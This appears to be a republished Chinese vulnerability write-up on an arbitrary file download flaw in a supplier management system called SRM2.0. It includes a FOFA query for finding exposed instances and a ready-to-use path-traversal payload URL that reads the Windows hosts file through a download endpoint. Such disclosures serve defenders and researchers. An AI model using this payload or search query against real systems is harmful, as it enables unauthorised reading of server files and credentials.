当前位置: 首页 > news >正文

某云彩SRM2.0任意文件下载漏洞

news 2025/7/21 3:53:09

文章目录

    • 免责申明
    • 搜索语法
    • 漏洞描述
    • 漏洞复现
    • 修复建议

免责申明

本文章仅供学习与交流,请勿用于非法用途,均由使用者本人负责,文章作者不为此承担任何责任

搜索语法

fofa

icon_hash="1665918155"

在这里插入图片描述

漏洞描述

某云采 SRM2.0是一款先进的供应链管理系统,旨在优化企业的采购流程和供应商管理。该系统通过云端技术,提供实时的数据分析和智能决策支持,帮助企业提高采购效率和降低成本。
该系统download在接口处存在任意文件下载漏洞

漏洞复现

payload

http://ip/adpweb/static/%2e%2e;/a/sys/runtimeLog/download?path=C:\Windows\System32\drivers\etc\hosts

在这里插入图片描述
在这里插入图片描述

修复建议

更新到最新版本


http://www.mrgr.cn/news/20096.html

相关文章:

  • 【附指定环境安装包】在Visual Studio Code中配置Python环境!
  • OpenAI 联合创始人的 AI 安全公司 SSI 筹集 10 亿美元资金|TodayAI
  • Linux - Linux安装部署Maven以及环境变量配置
  • 基于Pytorch深度学习——Transformer论文讲解/代码实现
  • 园区/高能耗企业 水-电-气-热-油采集系统-能源管理系统
  • 在 Ubuntu 下通过 Docker 部署 Minecraft 服务器
  • Java 面试题:从源码理解 ThreadLocal 如何解决内存泄漏 ConcurrentHashMap 如何保证并发安全 --xunznux
  • 陪诊志愿服务正在开展,喜鹊医疗打造国内首家陪诊聚合平台
  • C#中的GDI和GDI+(Graphics Device Interface Plus)图形设备接口
  • ubuntu 20.04 安装微信,WPS,腾讯会议
  • 【JavaScript】标准库:Math对象
  • 深入理解 Python 并发编程:多线程、多进程与异步
  • 大坝安全监测设备的工作原理
  • 稚晖君回应被称天才少年:没有必要如此称呼 只是兴趣使然
  • 观测云产品更新 | 日志、场景、异常追踪、监控、Pipeline等
  • 连接线转接线--KH-122-SMA-50
  • 【netty系列-10】通过netty实现http请求
  • 蓝牙技术|超高精度蓝牙位置服务将成为蓝牙定位产品发展方向
  • 背完langchain入门指南,你就是LLM大师
  • springboot驾校预约管理系统—计算机毕业设计源码25540